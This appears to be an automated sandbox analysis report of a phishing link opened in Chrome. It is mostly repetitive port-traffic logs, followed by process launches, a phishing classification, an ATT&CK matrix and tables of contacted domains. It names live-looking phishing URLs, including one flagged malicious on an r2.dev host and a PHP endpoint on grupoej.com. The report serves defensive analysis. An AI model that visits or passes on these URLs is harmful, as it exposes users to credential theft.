Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901

Source: unknown	HTTPS traffic detected: 23.44.104.130:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.44.104.130:443 -> 192.168.2.4:49762 version: TLS 1.2

Source: classification engine

Classification label: mal72.phis.win@33/172@84/24

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2544,i,8162842687041464593,4945717451503963078,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://znixulyp.com/vGgw6o"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2544,i,8162842687041464593,4945717451503963078,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Accept
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Accept
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Accept

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://cct.google/taggy/agent.js	0%	URL Reputation	safe
https://static.ads-twitter.com/uwt.js	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
znixulyp.com	52.2.56.64	true	false	unknown
app.usercentrics.eu	35.190.14.188	true	false	unknown
google.com	172.217.215.100	true	false	high
at.prod.jimdo.systems	54.217.4.226	true	false	unknown
web.cmp.usercentrics.eu	34.149.254.14	true	false	unknown
feature-flags-proxy.prod.jimdo.systems	54.72.164.245	true	false	unknown
account.prod.jimdo.systems	18.200.162.103	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	unknown
jimdo-dolphin-static-assets-prod.freetls.fastly.net	151.101.2.79	true	false	unknown
part-0013.t-0009.t-msedge.net	13.107.246.41	true	false	unknown
code.jquery.com	151.101.130.137	true	false	high
uct.service.usercentrics.eu	34.95.108.180	true	false	unknown
pub-06c7664497d24b6cb36a093c4426dcca.r2.dev	104.18.3.35	true	false	unknown
cdnjs.cloudflare.com	104.17.24.14	true	false	high
consent-api.service.consent.usercentrics.eu	35.201.111.240	true	false	unknown
jimdo-storage.freetls.fastly.net	151.101.2.79	true	false	unknown
challenges.cloudflare.com	104.17.2.184	true	false	high
www.google.com	64.233.177.105	true	false	high
grupoej.com	192.185.144.111	true	false	unknown
part-0012.t-0009.t-msedge.net	13.107.213.40	true	false	unknown
v1.api.service.cmp.usercentrics.eu	34.102.170.124	true	false	unknown
a.prod.jimdo.systems	18.200.162.103	true	false	unknown
account.e.jimdo.com	unknown	unknown	false	high
doc-36.jimdosite.com	unknown	unknown	false	high
country.jimdo.com	unknown	unknown	false	high
a.jimdo.com	unknown	unknown	false	high
fonts.jimstatic.com	unknown	unknown	false	unknown
www.jimdo.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://uct.service.usercentrics.eu/uct?v=2&sid=k1JwB2Dk_&t=1&abv=&r=https%3A%2F%2Fwww.jimdo.com%2F%3Futm_source%3Ddol-doc-36%2520en-US%26utm_medium%3Dfooter%2520ad%26utm_campaign%3Downads%2520webview&cb=1713461994702	false	unknown
https://consent-api.service.consent.usercentrics.eu/consent/uw/3	false	unknown
https://web.cmp.usercentrics.eu/ui/v/3.12.1/cmp.cd839b23.js	false	unknown
https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html	true	unknown
https://feature-flags-proxy.prod.jimdo.systems/feature-flags?shd=9fd385e0-f7a5-426c-95a1-fb5ff9bd4635&custom=%7B%22language%22%3A%22en%22%2C%22isMobileLayout%22%3Afalse%2C%22jimdoApp%22%3A%22lp%22%2C%22isAffiliate%22%3Afalse%7D	false	unknown
about:blank	false	low
https://doc-36.jimdosite.com/imprint/	false	high
https://jimdo-storage.freetls.fastly.net/image/454238981/23f5ed5a-6c3b-4b7b-a128-0fd6b1efd2a9.png?quality=80,90&auto=webp&disable=upscale&width=320&height=320	false	unknown
https://grupoej.com/awazwwazq/host%5b24.0%5d/dd49311.php	false	unknown
https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/b98099b58f789b786e66.js	false	unknown
https://at.prod.jimdo.systems/anon	false	unknown
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css	false	high
https://doc-36.jimdosite.com/	false	high
https://a.jimdo.com/app/price/index/country	false	high
https://challenges.cloudflare.com/turnstile/v0/g/54ea73d52131/api.js?onload=onloadTurnstileCallback	false	high
https://account.e.jimdo.com/openid/authorize?client_id=lc-website&redirect_uri=https://www.jimdo.com/oidc-silent-callback/&response_type=id_token&scope=openid%20email%20profile&state=256b7a98da7746ca9ff5752a1b68e60e&nonce=7640dc06b94045b186e893193bb13880&prompt=none	false	high
https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback	false	high
https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/default-website-favicon.1a874ea70dbf3a4b0e0e..png	false	unknown
https://web.cmp.usercentrics.eu/ui/v/3.12.1/UcGdprCmpView.5cabf3a0.js	false	unknown
https://at.prod.jimdo.systems/cf	false	unknown
https://web.cmp.usercentrics.eu/ui/loader.js	false	unknown
https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/d330293187a93ee79023.css	false	unknown
https://v1.api.service.cmp.usercentrics.eu/latest/core/k1JwB2Dk_	false	unknown
https://www.google.com/.well-known/web-identity	false	high
https://at.prod.jimdo.systems/rich	false	unknown
https://web.cmp.usercentrics.eu/ui/v/3.12.1/GdprCmpController.3f26e812.js	false	unknown
https://www.jimdo.com/oidc-silent-callback/#error=login_required&error_description=The%20Authorization%20Server%20requires%20End-User%20authentication&state=256b7a98da7746ca9ff5752a1b68e60e	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://fontawesome.io	chromecache_137.2.dr	false		high
https://tools.google.com/dlpage/gaoptout)	chromecache_155.2.dr	false		high
https://www.tiktok.com/legal/cookie-policy?lang=en	chromecache_155.2.dr	false		unknown
https://vwo.com/compliance/privacy-principles/	chromecache_189.2.dr, chromecache_215.2.dr	false		high
https://www.jimdo.com/fr/addon/legal-text-generator/)	chromecache_155.2.dr	false		high
https://policy.pinterest.com/en/privacy-policy	chromecache_155.2.dr	false		high
https://fonts.jimstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)	chromecache_182.2.dr	false		unknown
https://www.paypal.com/ie/webapps/mpp/ua/privacy-full	chromecache_155.2.dr	false		high
https://www.spotify.com/jp/legal/privacy-policy/	chromecache_155.2.dr	false		high
https://www.spotify.com/de/legal/privacy-policy/	chromecache_155.2.dr	false		high
https://fonts.jimstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)	chromecache_182.2.dr	false		unknown
https://twitter.com/personalization	chromecache_189.2.dr, chromecache_215.2.dr	false		high
https://stripe.com/cookies-policy/legal	chromecache_155.2.dr	false		high
https://jimdo-community-events.jimdosite.com/events/	chromecache_201.2.dr	false		high
https://www.jimdo.com/it/addon/legal-text-generator/)	chromecache_155.2.dr	false		high
https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#skipped_moment	chromecache_203.2.dr	false		high
https://www.google.com	chromecache_170.2.dr	false		high
https://policies.google.com/privacy?hl=it	chromecache_155.2.dr	false		high
https://www.fullstory.com/optout	chromecache_189.2.dr, chromecache_215.2.dr	false		high
https://fonts.jimstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)	chromecache_182.2.dr	false		unknown
